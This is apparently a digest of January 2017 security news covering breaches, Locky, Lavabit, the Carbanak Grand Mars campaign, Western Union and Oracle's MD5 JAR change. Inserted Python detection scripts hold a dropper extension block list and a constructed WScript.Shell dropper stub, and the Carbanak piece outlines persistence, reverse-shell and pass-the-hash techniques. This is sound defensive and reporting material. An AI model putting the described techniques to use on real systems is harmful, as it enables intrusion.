Supercell, the maker of the popular “Clash of Clans” mobile game, has admitted that accounts on the Supercell community forum were compromised. Supercell also develops Hay Day, Clash Royale, and Boom Beach.

According to an official statement issued by the company, hackers compromised more than 1 million accounts in a data breach that occurred in September 2016.

LeakBase put the number of affected user accounts at about 1 million.

The company said in an official statement that the breach happened in September 2016 and that only the site’s forums were affected. According to the company, hackers exploited a vulnerability in the vBulletin forum software used by Supercell.

The company confirmed that game accounts weren’t affected by the data breach.

“As we’ve said before, to provide our forum service we use software from vbulletin.com. We’re currently looking into report that a vulnerability allowed third-party hackers to gain illegal access to some forum user information, including a number of emails and encrypted passwords.” reads the official statement from the company. “Our preliminary investigation suggests that the breach happened in September 2016 and it has since been fixed. ”


Supercell urges users to change the password they use on the affected forum as soon as possible. Users can reset their password here: https://forum.supercell.com/login.php?do=lostpw

As usual, users should also change the password on any other web service where they used the same credentials. As a general rule, the same credentials should never be reused across sites.

“We take any such breaches very seriously and we follow very strict policies when it comes to security. Please note that this breach only affects our Forum service. Game accounts have not been affected.” the company added.

National Aids Research Institute NARI hacked by the Shad0w Security crew
21.1.2017 securityaffairs Hacking

The hacker @Sc0rp10nGh0s7 from the Shad0w Security group has broken into a server of India's National AIDS Research Institute (NARI).
The hacker @Sc0rp10nGh0s7 from the Shad0w Security crew has broken into a server of India's National AIDS Research Institute (NARI). The hacker accessed an archive of more than 1 GB containing the results of dozens of HIV tests.

The hacker released only a small portion of the compromised archive as proof of the breach. They explained to me that they want to avoid causing problems for the patients; the hack is meant to demonstrate that the Institute's security staff is unable to protect such sensitive information.

“this time we won’t leak everything, since our purpose is to hurt the gov not the people. The database file I have is more than 1Gb” said @Sc0rp10nGh0s7.

When I asked for more technical details about the attack, the hacker told me they prefer to keep the flaws secret.

I decided to avoid publishing the link to the data due to nature of the victim.

He also told me that NARI has a reasonable level of security despite the hack. The hacker breached an internal server of the organization and noticed that the administrator keeps usernames and passwords in a plain text file.

“the way we choose the targets is random that helps us to not be expected, we will be in a place they least expect us to be” added the hacker.

The hackers say they breached the entire internal network.

In November 2016, the Shad0wS3C group hacked the Institute of the Registral Function of the State of Mexico (FREM) and leaked its database online.

In August 2016, the group hacked the website of Paraguay’s Secretary of National Emergency (SNE) and leaked a dump of a PostgreSQL database online.

Necurs botnet is back and starts delivering the Locky ransomware
21.1.2017 securityaffairs

Cisco Talos researchers have noticed traffic from the dormant Necurs botnet and are warning of a possible new large-scale ransomware spam campaign.
Security researchers at Cisco Talos have seen traces of traffic from the dormant Necurs botnet and are warning that a new massive ransomware spam campaign may be coming.

Talos reports that Locky spam activity has picked up again, but not nearly at the volumes seen previously. “A couple of days ago we finally started seeing some spam campaigns start delivering Locky again,” the researchers wrote. “The key difference here is around volume. We typically would see hundreds of thousands of Locky spam.”


At the time of writing, researchers had seen fewer than a thousand Necurs spam messages, but the situation could change rapidly. The Necurs botnet, one of the world’s largest malicious infrastructures, was used to spread the Dridex banking malware and the Locky ransomware before it went quiet on June 1.

In October 2015, a joint international law enforcement operation involving the FBI and the NCA took down the botnet, but it later resurfaced and was used mainly to spread the Locky ransomware.


Now the Necurs botnet is again being used to deliver the Locky ransomware, and the number of attacks has quietly increased over the last week.

“Since late December we haven’t seen the typical volume of Locky, however, a couple of days ago we finally started seeing some spam campaigns start delivering Locky again,” Cisco’s researchers explained.

“The key difference here is around volume. We typically would see hundreds of thousands of Locky spam, [and now] we are currently seeing campaigns with less than a thousand messages.

“With both of these campaigns being relatively low volume these could be one offs or indicators of changes to come to the campaigns in the future.”

Talos researchers observed two campaigns that differ slightly from what they had seen before. One delivers a malicious JSE dropper inside a zip archive attached to spam messages; once run, the JSE script downloads two pieces of malware, the Locky ransomware and the Kovter Trojan.

The second campaign uses RAR archives instead of the usual zip files; extracting the archive yields a JavaScript file, doc_details.js.
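Both campaigns rely on the same lure: a small archive attachment whose only payload is a Windows script-host file. The Python script below is an added example (not Talos code and not part of the original article) showing how a mail gateway or triage job could flag that pattern. ZIP archives are opened in memory with the standard library; RAR archives, as used by the second campaign, are recognised by their magic bytes and quarantined for manual review, because parsing them would need a third-party module. The archive contents, file names and the RAR header stub are constructed for the demo; the only details taken from the article are the .jse and .js dropper extensions.

```python
"""Flag archive attachments that carry Windows script droppers.

Added example, not code from Talos or the article. Assumptions: the
attachment bytes have already been pulled out of the MIME message; only
ZIP is parsed (standard library); RAR is detected by magic bytes and
quarantined because parsing it needs a third-party module (e.g. rarfile).
"""
import io
import os
import zipfile

# Extensions that the Windows Script Host or the shell will execute when
# the user double-clicks the extracted file. The campaigns in the text
# used .jse (inside ZIP) and .js (inside RAR) droppers.
SCRIPT_EXTENSIONS = {".js", ".jse", ".vbs", ".vbe", ".wsf", ".wsh", ".hta", ".scr", ".exe"}
RAR_MAGIC = b"Rar!\x1a\x07"  # RAR 4.x and 5.x signatures both start this way


def suspicious_entries(names):
    """Return the archive members a gateway should block.

    Only the final extension matters: a lure such as "invoice.pdf.js"
    still ends in .js, so the double-extension trick does not help it.
    """
    return [name for name in names
            if os.path.splitext(name.lower())[1] in SCRIPT_EXTENSIONS]


def classify_attachment(data: bytes) -> dict:
    """Classify one attachment body.

    Returns {"type", "block", "entries", "reason"}. A ZIP is blocked only
    when it contains a script member; a RAR is always quarantined here.
    """
    if data.startswith(RAR_MAGIC):
        return {"type": "rar", "block": True, "entries": [],
                "reason": "RAR attachment; quarantine for manual review"}
    buf = io.BytesIO(data)
    if not zipfile.is_zipfile(buf):
        return {"type": "other", "block": False, "entries": [], "reason": ""}
    with zipfile.ZipFile(buf) as zf:
        names = [info.filename for info in zf.infolist() if not info.is_dir()]
    flagged = suspicious_entries(names)
    reason = ("script dropper inside archive: " + ", ".join(flagged)) if flagged else ""
    return {"type": "zip", "block": bool(flagged), "entries": flagged, "reason": reason}


def build_zip(members: dict) -> bytes:
    """Build an in-memory ZIP; used only to construct demo input."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in members.items():
            zf.writestr(name, content)
    return buf.getvalue()


# Constructed samples (not real campaign files): a ZIP holding a .jse
# dropper like the first campaign, a benign ZIP, and a RAR header stub.
DROPPER_ZIP = build_zip({"invoice_2017.jse": "var sh = new ActiveXObject('WScript.Shell');"})
BENIGN_ZIP = build_zip({"report.pdf": "%PDF-1.4 ... constructed placeholder"})
RAR_STUB = RAR_MAGIC + b"\x00" * 16

if __name__ == "__main__":
    for label, blob in (("dropper-zip", DROPPER_ZIP), ("benign-zip", BENIGN_ZIP), ("rar", RAR_STUB)):
        print(label, classify_attachment(blob))
```

In production the extension check belongs alongside content inspection (an archive member that starts with VBScript or JScript text regardless of its name), and the RAR branch would hand the file to an unpacker in a sandbox rather than blocking outright.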

“Crimeware is a lucrative endeavor with revenue rapidly approaching a billion dollars annually,” Cisco added. “This doesn’t come without significant risk and we may be entering a period where adversaries are increasingly cashing out from this activity early, to avoid severe penalties.”

Lavabit, the Snowden recommended encrypted email service, is back
21.1.2017 securityaffairs Security

Lavabit, the Snowden recommended encrypted email service, is back. Its CEO Ladar Levison announced new privacy-enhancing features.
Do you remember Lavabit? It was the US encrypted email service used by whistleblower Edward Snowden.
Lavabit was an encrypted webmail service founded in 2004 by Ladar Levison. It closed on August 8, 2013 after US authorities ordered it to hand over its Secure Sockets Layer (SSL) private keys to enable government surveillance; the US Government was interested in reading Edward Snowden’s emails.
In March 2016, a redaction error in the court-ordered release of the Lavabit case files confirmed that Edward Snowden was the target of the FBI investigation that led to the service's shutdown.

Snowden was a Lavabit user, and the FBI drove the company to close because it refused to comply with the US Government’s demands.

The US Government first ordered Lavabit to install a surveillance device on its servers and later to turn over its encryption keys, which would have let the FBI access Snowden’s messages. The court order also barred the company from disclosing the surveillance to third parties.

After a few weeks of legal dispute, Levison shuttered Lavabit rather than become complicit in what he considered criminal surveillance by the US Government.

“After 38 days of legal fighting, a court appearance, subpoena, appeals and being found in contempt of court, Levison abruptly shuttered Lavabit citing government interference and stating that he would not become “complicit in crimes against the American people”.” reported the Guardian.

US authorities inadvertently revealed the circumstances behind the Lavabit shutdown by publishing case files that were not correctly redacted, exposing the target of the FBI’s activity: the email address Ed_Snowden@lavabit.com.

The document was published in full by Cryptome; Snowden’s email address is visibly left unredacted.


The documents were disclosed as a result of Levison’s legal battle with the US Government: he filed a motion in December 2015 that prompted the court to order the release of the Lavabit case files.

Now, Levison has announced that he is reviving the Lavabit service, fixing the SSL issue and implementing new privacy-enhancing features.
The Lavabit CEO is releasing the source code for an open-source end-to-end encrypted email standard, dubbed Dark Internet Mail Environment (DIME), designed to resist government surveillance and to protect metadata.

“Developed by Lavabit, DIME is an open source secure end-to-end communications platform for asynchronous messaging across the Internet. DIME follows in the footsteps of innovative email protocols, but takes advantage of the lessons learned during the 20-year history of PGP based encrypted communication. DIME is the technological evolution over current standards, OpenPGP and S/MIME, which are both difficult to deploy and only narrowly adopted. Recent revelations regarding surveillance have pushed OpenPGP and S/MIME to the forefront, but these standards simply can’t address the current privacy crisis because they don’t provide automatic encryption or protect metadata. By encrypting all facets of an email transmission (body, metadata and transport layer), DIME guarantees the security of users and the least amount of information leakage possible. A security first design, DIME solves problems that plague legacy standards and combines the best of current technologies into a complete system that gives users the greatest protection possible without sacrificing functionality.” states the description of the standard published by Lavabit.


The DIME standard will be available on GitHub along with a mail server application dubbed Magma, designed to let users with existing email clients use the Lavabit service easily.
“To learn more about DIME & Magma we invite you to join the Dark Mail Technical Alliance https://darkmail.info/ where you can find the latest code & specifications, provide feedback, and contribute to the development effort.”

DIME: https://darkmail.info/spec
DMAP: https://tools.ietf.org/id/draft-melnikov-dmap-00.txt
STACIE: https://tools.ietf.org/id/draft-ladar-stacie-00.txt
MAGMA: https://github.com/lavabit/magma
LIBDIME: https://github.com/lavabit/libdime
DIME defines a ‘Trustful’ encryption mode, in which users trust the server to perform the encryption and manage their keys.
“The server performs the encryption on your behalf, and as such, you must trust that the server will not be rewritten in such a way that it captures your password, or peeks at your messages during processing,” Levison said.

DIME also offers stricter control over encryption keys through Cautious and Paranoid modes; in Paranoid mode, for example, Lavabit never stores a user’s private keys on its server.

Initially the Lavabit service will be accessible only to existing customers, and only in Trustful mode; others can pre-register and wait for the rollout.

Lavabit — Encrypted Email Service Once Used by Snowden, Is Back
21.1.2017 thehackernews Safety
Texas-based encrypted email service Lavabit, which was forced to shut down in 2013 after refusing to comply with a court order demanding its SSL keys so that the government could snoop on Edward Snowden's emails, is relaunching on Friday.
Lavabit CEO Ladar Levison had custody of the service's SSL private key, which could have helped the government obtain Snowden's password. Although the FBI insisted it was only after Snowden's account, that key was the key to the kingdom: it would have let agents obtain other users’ credentials as well.
Rather than comply with a federal request that would compromise the communications of all of its customers, Levison chose to shut down his encrypted email service, leaving its 410,000 users unable to access their email accounts.
Now, Levison has announced that he is reviving Lavabit with a new architecture that fixes the SSL problem, which according to him was the biggest threat, and adds other privacy-enhancing features that let users send emails he cannot eavesdrop on, even if ordered to do so.

Levison is releasing the source code for an open-source end-to-end encrypted email standard that promises surveillance-resistant messaging and hides email metadata, so that agencies like the NSA or FBI cannot find out with whom Lavabit users communicate.
Dubbed Dark Internet Mail Environment (DIME), the standard will be available on Github today, along with an associated mail server program called Magma, which is ready for use with the Dark Internet Mail Environment.
"DIME is the only automated, federated, encryption standard designed to work with different service providers while minimizing the leakage of metadata without a centralized authority," Levison said in a blog post.
"By encrypting all facets of an email transmission (body, metadata, and transport layer), DIME guarantees the security of users and the least amount of information leakage possible."
According to Levison, the Magma server is designed so that even non-technical users with existing email clients can use the Lavabit encrypted email service easily.

The DIME standard includes a ‘Trustful’ encryption mode, which requires users to trust the server to manage the encryption and their keys.
"The server performs the encryption on your behalf, and as such, you must trust that the server will not be rewritten in such a way that it captures your password, or peeks at your messages during processing," Levison said.
DIME also offers Cautious and Paranoid modes for users who want full control over their encryption keys; in Paranoid mode, Lavabit never stores a user’s private keys on its server.
Initially, the new Lavabit service will be accessible only to its existing customers, and only in Trustful mode.
However, if you were not a Lavabit customer before the service shut down, you can pre-register and wait for the eventual rollout.

Carbanak Group Used Numerous Tools in Recent Attacks

20.1.2017 Securityweek Virus
The infamous Carbanak group of hackers has been using multiple tools in a series of attacks over the past several months, Trustwave security researchers reveal.

Starting in September 2016, the Carbanak hackers began targeting large companies in the hospitality sector in Europe and the United States, in a series of attacks that are now said to have employed different types of malicious software.

In a recent report (PDF), Trustwave researchers revealed details of the malware used. Some of the executables were signed with digital certificates issued by Comodo in an attempt to bypass security controls; the certificates were most likely acquired using fake identities, all with Russian details (city, address, etc.).

The Carbanak group, also known as Anunak, was exposed in 2015 after supposedly stealing upwards of $1 billion from more than 100 banks across 30 countries.

Called Grand Mars, after one of the fake company names used to purchase certificates from Comodo, these latest attacks were not aiming at financial gains alone.

“The motivation of this operation appears to be financial gain, total control of the infrastructure and collection of bots within the victim organizations. During the forensics investigation and analysis, we were given the impression that several activities have been performed by different persons or even different groups of people,” Trustwave notes.

Multiple cybercrime organizations might have cooperated in the Grand Mars operation to establish a complex system of network hosts, using numerous malicious files to attack multiple victims. During the campaign they switched command and control (C&C) servers to stay undetected; the majority of the C&C IP addresses were located in Europe (UK, France, Sweden and Germany), with some in the United States.

As in other Carbanak attacks, malicious macros in Microsoft Word documents attached to emails served as the entry point. Once the attachment was opened and the embedded Visual Basic macro executed, four files were dropped onto the system to establish a foothold.

The four dropped files are:

Starter.vbs, which uses the registry Autorun key and Task Scheduler to achieve persistence;
TransbaseOdbcDriver.js, which connects to Google services (Forcepoint described the process earlier this week) and to Pastebin for victim ID, tracking and command retrieval;
LanCradDriver.vbs, which reads and executes the commands written to a LanCradDriver.ini file, initially created empty and later populated by the previous script; and
dttsg.txt.

The attackers used a variety of tools to achieve persistence as well, namely a PowerShell script (downloaded from Google Docs), registry Autorun (they create a key in the registry to ensure the payload runs immediately after reboot), and Task Scheduler (a scheduled task is triggered every 30 minutes indefinitely to run Starter.vbs and launch the execution chain: Starter.vbs > TransbaseOdbcDriver.js > LanCradDriver.vbs > LanCradDriver.ini).

Other tools used in this campaign and deemed malicious include AdobeUpdateManagementTool.vbs (designed to connect to the C&C and perform data exfiltration), UVZHDVlZ.exe (a variant of the Carbanak malware), Update.exe (Beacon, Cobalt Strike’s post-exploitation tool), and 322.exe (a TCP reverse shell). These files were primarily designed for persistence or data exfiltration.
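The persistence pattern described above (a script host launching a dropped .vbs/.js file from a Run key or a scheduled task that fires every 30 minutes) is something a defender can hunt for in autorun inventories. The following is an added example written for this page, not tooling from Trustwave or the report; the entry format, the field names and the sample entries are this example's own constructed data, modelled on the Starter.vbs chain, and the thresholds are assumptions to tune per environment.

```python
"""Triage autorun and scheduled-task entries for script-based persistence.

Added example (not from the Trustwave report or its tooling). It flags the
pattern described above: a Windows script host launching a .vbs/.js payload
from a user-writable directory, registered under a Run key or as a scheduled
task that repeats at short intervals. The entries are constructed sample
data, not real telemetry; the field names are this example's own.
"""
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SCRIPT_FILE = re.compile(r"\.(vbs|vbe|js|jse|wsf)\b", re.IGNORECASE)
# Directories an unprivileged user can write to; dropped payloads usually live here.
USER_WRITABLE = re.compile(r"\\(Users\\[^\\]+\\AppData|ProgramData|Windows\\Temp)\\", re.IGNORECASE)
SHORT_INTERVAL_MINUTES = 60   # assumption: repeating at or below this looks beacon-like


@dataclass
class AutorunEntry:
    source: str                              # e.g. "registry:HKCU\\...\\Run\\<value>" or "task:\\<name>"
    command: str                             # full command line as registered
    interval_minutes: Optional[int] = None   # repetition interval for scheduled tasks, else None


def executable_name(command: str) -> str:
    """Return the lower-cased file name of the program a command line launches."""
    cmd = command.strip()
    if not cmd:
        return ""
    first = cmd[1:].split('"', 1)[0] if cmd.startswith('"') else cmd.split()[0]
    return first.rsplit("\\", 1)[-1].lower()


def triage_reasons(entry: AutorunEntry) -> List[str]:
    """List the indicators an entry exhibits; an empty list means nothing notable."""
    reasons = []
    if executable_name(entry.command) in SCRIPT_HOSTS and SCRIPT_FILE.search(entry.command):
        reasons.append("script host launching a script file")
    if USER_WRITABLE.search(entry.command):
        reasons.append("payload in a user-writable directory")
    if entry.interval_minutes is not None and entry.interval_minutes <= SHORT_INTERVAL_MINUTES:
        reasons.append(f"task repeats every {entry.interval_minutes} minutes")
    return reasons


def find_suspicious(entries: List[AutorunEntry], min_reasons: int = 2) -> List[Tuple[str, List[str]]]:
    """Return (source, reasons) for entries with at least `min_reasons` indicators.

    Requiring two indicators keeps legitimate per-user updaters that live in
    AppData (a single indicator) out of the result.
    """
    flagged = []
    for entry in entries:
        reasons = triage_reasons(entry)
        if len(reasons) >= min_reasons:
            flagged.append((entry.source, reasons))
    return flagged


# Constructed sample data modelled on the execution chain described in the report.
SAMPLE_ENTRIES = [
    AutorunEntry("registry:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Starter",
                 'wscript.exe //B "C:\\Users\\alice\\AppData\\Roaming\\Starter.vbs"'),
    AutorunEntry("task:\\TransbaseOdbcUpdate",
                 'C:\\Windows\\System32\\wscript.exe //B "C:\\ProgramData\\Starter.vbs"',
                 interval_minutes=30),
    AutorunEntry("task:\\OneDrive Standalone Update",
                 "C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDriveStandaloneUpdater.exe",
                 interval_minutes=1440),
    AutorunEntry("registry:HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\VendorAgent",
                 '"C:\\Program Files\\Vendor\\Agent.exe" --tray'),
]

if __name__ == "__main__":
    for source, reasons in find_suspicious(SAMPLE_ENTRIES):
        print(source, "->", "; ".join(reasons))
```

In practice the entries would come from an autoruns export or a scheduled-task query; the two-indicator rule is what keeps the per-user OneDrive updater in the sample from being reported while both Starter.vbs registrations are.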

“Using services such as Google Docs in order to keep track of victims and spreading malicious files becomes a very big challenge for defenders because this way is very difficult to distinguish between good and bad guys using these popular public cloud services,” the report reads.

For lateral movement in the compromised networks, the attackers used pass-the-hash, which allowed them to steal the credentials of a domain-level, highly privileged user, the security researchers reveal. Using this technique, actors steal credential hashes from a compromised system and can expand their foothold in the network if local accounts share the same password across the infrastructure.

“Ultimately this allowed attackers to achieve domain or even enterprise admin access and gain network access by utilizing several resources as Command & Control points in Europe and US. Further investigation of the attacked infrastructure showed that the intruders deployed similar PowerShell scripts or embedded batch files in order to spread within the environment,” Trustwave’s report reads.

While some of the attacks associated with this campaign might have been performed by different malicious groups (different stages of the same attack might even have been carried out by different groups), “the attack characteristics of this family of malware share several common traits with the, original, well understood Carbanak APT campaign, which has been positively attributed to the Russian underground financial cybercrime network,” Trustwave concludes.

Western Union Pays $586 Million to Settle Fraud Charges

20.1.2017 Securityweek Incident
Global financial services company Western Union has admitted to facilitating wire fraud and it has agreed to forfeit $586 million as part of a settlement with the U.S. Federal Trade Commission (FTC) and the Department of Justice.

Western Union’s services have often been used by fraudsters and cybercriminals, and authorities in the United States have been displeased with the fact that the company has failed to maintain a proper anti-fraud program.

Furthermore, the company has been accused of not taking immediate action against agents that knowingly processed fraud payments in return for a cut of the illegal profits. Since 2001, the Department of Justice has convicted 29 owners and employees of Western Union agents for their role in fraud schemes.

According to authorities, Western Union has violated several laws, including the Bank Secrecy Act (BSA) and the FTC Act.

The FTC said Western Union had received, between January 2004 and August 2015, more than 550,000 complaints regarding fraudulent transfers involving advance-fee, online dating, lottery, and family emergency scams. These transfers totaled more than $632 million, but they are believed to represent only a fraction as not all complaints have been logged, not all victims filed a complaint, and fraud-reporting mechanisms are not available everywhere.

As part of its settlement with the FTC and the Justice Department, Western Union has agreed to forfeit $586 million, a sum that will be used to compensate fraud victims. The process through which the money will be distributed will be established at a later date.

The company will also implement and maintain a comprehensive anti-fraud program, thoroughly vet new and renewing agents, and suspend or terminate agents that don’t comply with its policies.

The FTC has ordered Western Union to stop processing fraud-induced and telemarketing-related money transfers, provide more fraud warnings, create additional channels for fraud complaints, and refund fraudulent transfers.

MoneyGram, Western Union’s main competitor, was also targeted by the FTC. The company agreed to pay $18 million in 2009 to settle charges.

Endgame Unveils Siri-like Feature for Security Operations Teams

20.1.2017 Securityweek Apple
Threat protection firm Endgame today announced a new AI-powered chatbot feature within its Endgame Detect and Respond (EDR) platform designed to support security analysts.

Dubbed Artemis, named after the mythological goddess of the hunt, the feature could be described as a 'Siri for SOCs'; an intelligent assistant whose purpose is to simplify and automate the hunt for network-resident attackers.

EDR's purpose is the automated use of machine learning to detect subtle indications of anomalous behavior that might indicate the presence of an attacker.

EDR is a hunter; but like all hunters it is most efficient with the help of a terrain guide. In modern Security Operations Centers, that guide is the system analyst, who directs and controls the hunter. Together, top-tier analysts and machine-learning automation are seen as the most effective method of detecting attackers before they can do damage.

The problem is the security skills gap -- the scarcity and cost of professional talent. According to HPE's recently published 2017 State of Security Operations report, staffing issues are one of the prime causes of SOCs failing to reach the required level of maturity. Artemis is designed to address this problem as an intelligent conversational assistant to systems analysts.

"Security teams are faced with two major challenges," says Jamie Butler, CTO at Endgame: "insufficient resources to stop attacks in-progress and lack of automated solutions to uncover malicious behavior in time to prevent information theft. Just as digital assistants like Siri or Alexa proved their ability to give time back to our day by tackling complex tasks, Artemis is an assistant that automatically combs through millions of data points to provide intelligent decisions for the security industry. Security teams," he adds, "especially those that lack sufficient resources, will now have the analytic depth required to find malicious activity across all enterprise endpoints and eliminate threats in time to stop damage and loss."

As an example, if an analyst were to ask Artemis "what is suspicious in my network today?", Artemis would comb through millions of events across endpoints in seconds and provide the user with a comprehensive list of malicious activity. But Artemis goes beyond detection into response. She then recommends a course of action and can be instructed to kill dangerous processes instantly.

In effect, Artemis empowers less-experienced Tier 1 analysts to behave at the same level of sophistication as a Tier 3. She helps SOCs adopt automation without suffering from the usual staffing problems.

Endgame raised $23 million in Series B funding in March 2013, followed by $30 million in Series C funding in November 2014.

In December 2016, Endgame announced that it had been awarded an $18.8 million contract with the U.S. Air Force to have elite Air Force Cyber Protection Teams leverage the Endgame platform to protect endpoints and critical infrastructure.

Oracle Will Stop Trusting MD5-Signed JAR Files in April

20.1.2017 Securityweek Vulnerability
Oracle has decided to give Java developers more time to ensure that their JAR files are not signed with the MD5 algorithm. Java Runtime Environment (JRE) will no longer trust these types of files starting with April 2017.

The company announced in October plans to stop trusting JAR files signed with the MD5 algorithm, which has been known to have collision vulnerabilities for more than a decade. Oracle stopped using MD5 as the default JAR signing option in 2006 and the company now wants to take things even further.

Starting with Java SE 8u131, scheduled for release with the April 2017 Critical Patch Update (CPU), JAR files signed with MD5 will be treated as unsigned files and will not be trusted. Oracle had initially planned to stop trusting MD5-signed files in January 2017, but some developers have requested additional time to prepare for this change.

Developers have been advised to check whether their JAR files have been signed using MD5 and to re-sign them with a stronger algorithm or key size. The following zip command can be used to remove existing MD5 signatures:

zip -d test.jar 'META-INF/*.SF' 'META-INF/*.RSA' 'META-INF/*.DSA'

“If you are using JARS you did not sign or build yourself, you need to contact your vendor for more information,” explained Oracle’s Erik Costlow in October. “If it can no longer be established if a JAR you are using has been signed with MD5, the recommended practice is to re-sign affected JAR files using a more modern algorithm.”
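To check whether a JAR is affected before re-signing it, the digest algorithm can be read directly from the META-INF/*.SF signature files, whose headers are named after the algorithm (MD5-Digest, SHA1-Digest, SHA-256-Digest and their -Manifest variants). The following is an added example written for this page, not Oracle's tooling; it also rebuilds the JAR without its signature files, which is what the zip -d command above does. The JARs it inspects are constructed in memory, with placeholder digest values.

```python
"""Find MD5 digests in a signed JAR and strip its signature files.

Added example; it is not Oracle's tooling and does not replace jarsigner.
A signed JAR carries META-INF/*.SF files whose headers name the digest
algorithm (for example "MD5-Digest", "SHA1-Digest", "SHA-256-Digest" and
their "-Manifest" variants), so the algorithm can be read without a JDK.
The JARs used here are constructed in memory as sample input.
"""
import io
import re
import zipfile
from typing import Dict, List, Set

# "<algorithm>-Digest:", "<algorithm>-Digest-Manifest:", "<algorithm>-Digest-Manifest-Main-Attributes:"
DIGEST_HEADER = re.compile(r"^([A-Za-z0-9-]+?)-Digest(?:-Manifest(?:-Main-Attributes)?)?:")
SIGNATURE_SUFFIXES = (".SF", ".RSA", ".DSA", ".EC")   # .EC covers ECDSA signature blocks


def _unwrap_manifest(text: str) -> str:
    """Join manifest continuation lines (a line starting with a space continues the previous line)."""
    return text.replace("\r\n", "\n").replace("\n ", "")


def digest_algorithms(jar_bytes: bytes) -> Dict[str, Set[str]]:
    """Map each META-INF/*.SF file in the JAR to the set of digest algorithms it declares."""
    found: Dict[str, Set[str]] = {}
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        for name in zf.namelist():
            upper = name.upper()
            if upper.startswith("META-INF/") and upper.endswith(".SF"):
                text = _unwrap_manifest(zf.read(name).decode("utf-8", "replace"))
                found[name] = {m.group(1).upper()
                               for m in map(DIGEST_HEADER.match, text.split("\n")) if m}
    return found


def uses_md5(jar_bytes: bytes) -> bool:
    """True if any signature file in the JAR relies on MD5 digests."""
    return any("MD5" in algos for algos in digest_algorithms(jar_bytes).values())


def strip_signatures(jar_bytes: bytes) -> bytes:
    """Rebuild the JAR without META-INF signature files.

    Equivalent to the zip -d command above; the result is an unsigned JAR
    that must be re-signed with jarsigner using a modern digest.
    """
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as src, zipfile.ZipFile(out, "w") as dst:
        for info in src.infolist():
            upper = info.filename.upper()
            if upper.startswith("META-INF/") and upper.endswith(SIGNATURE_SUFFIXES):
                continue
            dst.writestr(info, src.read(info.filename))
    return out.getvalue()


def entry_names(jar_bytes: bytes) -> List[str]:
    """Sorted list of entries in the JAR (handy for checking what strip_signatures left)."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as zf:
        return sorted(zf.namelist())


# Constructed sample signature files; digest values are placeholders, not real hashes.
MD5_SF = ("Signature-Version: 1.0\r\nMD5-Digest-Manifest: AAAA\r\n"
          "Created-By: 1.5.0 (Sun Microsystems Inc.)\r\n"
          "\r\nName: Hello.class\r\nMD5-Digest: AAAA\r\n\r\n")
SHA256_SF = ("Signature-Version: 1.0\r\nSHA-256-Digest-Manifest-Main-Attributes: BBBB\r\n"
             "SHA-256-Digest-Manifest: BBBB\r\nCreated-By: 1.8.0 (Oracle Corporation)\r\n"
             "\r\nName: Hello.class\r\nSHA-256-Digest: BBBB\r\n\r\n")


def build_sample_jar(sf_text: str) -> bytes:
    """Constructed sample JAR: a manifest, one signature file, a dummy signature block and one class."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("META-INF/MANIFEST.MF", "Manifest-Version: 1.0\r\n\r\n")
        zf.writestr("META-INF/SIGNER.SF", sf_text)
        zf.writestr("META-INF/SIGNER.RSA", b"\x30\x00")   # placeholder, not a real PKCS#7 block
        zf.writestr("Hello.class", b"\xca\xfe\xba\xbe")
    return buf.getvalue()


if __name__ == "__main__":
    for label, sf in (("MD5-signed", MD5_SF), ("SHA-256-signed", SHA256_SF)):
        jar = build_sample_jar(sf)
        print(label, digest_algorithms(jar), "needs re-signing" if uses_md5(jar) else "ok")
```

This inspects only the digests declared in the .SF files; the digest used inside the PKCS#7 signature block (the .RSA/.DSA file) is a separate choice, so `jarsigner -verify -verbose -certs` from a current JDK remains the authoritative check before and after re-signing.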

Other cryptography-related changes planned by Oracle this year for JRE and JDK include disabling SHA-1 in certificate chains anchored by roots included by default in JDK, and increasing the minimum key length for SSL and TLS to 1024 bits.

Oracle’s latest CPU patches a total of 270 vulnerabilities across its products, including 158 weaknesses that can be exploited remotely by an unauthenticated attacker. A significant number of flaws have been found in Oracle’s E-Business Suite, which seems to have attracted the attention of researchers recently.

Report Examines State of Security Operations Centers

20.1.2017 Securityweek Security
Security Operations Centers (SOCs) are failing to meet the maturity level necessary to provide optimum security and efficiency. The 2017 State of Security Operations report finds that 82% of SOCs worldwide fail to achieve optimum maturity (a score of 3 on the Security Operations Maturity Model).

Worldwide, there has been a 3% improvement over last year; but no geographical region yet meets an average score of 2. To put this in context, North America scores 1.52 while different parts of Europe range between 1.26 and 1.47 (Benelux stands out at 1.79). Clearly there is considerable room for improvement in many SOCs; and without that improvement enterprises will remain vulnerable in the event of an attack.

The State of Security Operations report is an annual study compiled by Hewlett Packard Enterprise (HPE). It comes from the study of 137 discrete SOCs and 183 in-depth assessments. It analyzes why organizations' SOCs fall below optimum maturity, and what can be done to improve matters. Sometimes cause and remedy seem counter-intuitive -- but one difficulty keeps emerging: the difficulty in recruiting and retaining adequate security talent. Lack of qualified staff frequently leads to less than optimum solutions.

One example is in the use of a managed service provider. The immediate effect could be improved security, a reduction in costs, and reduced strain on staff recruitment. But this will decline over time without continuous management of the MSP. The use of an MSP -- which is no bad thing -- should be an active choice to improve security rather than a defensive response to reduce costs.

HPE suggests that where companies need to augment security but cannot afford the additional staff to do so, they should consider a hybrid MSP/internal integrated solution. Internal operational capability can more appropriately manage risk; will be better able to coordinate incident response; and can better align security with the organization's business objectives. In all cases the organization needs to go beyond the MSP's standard SLA to ensure that security can be or remain integrated with business objectives.

The staffing issue resurfaces with automation. The difficulty in finding and keeping quality analysts persuades some organizations to consider replacing front line analysts with automation -- but while this is good in theory, it is not always good in practice. Effective automation requires a high degree of confidence in configuration management, and organizations often have a lack of maturity in information about the applications, users, systems, and data residing in disparate repositories.

The risk of breaking something that has not been well documented then persuades some organizations to turn to an alternative but equally ineffective method: automated ticket generation. This isn't always bad, suggests HPE, but "when dealing with the behavior of an advanced threat actor and coordinated campaigns that span time, this approach usually turns the analyst into a myopic responder." In short, SOCs should think hard before eliminating front-line analysts in favor of automation.

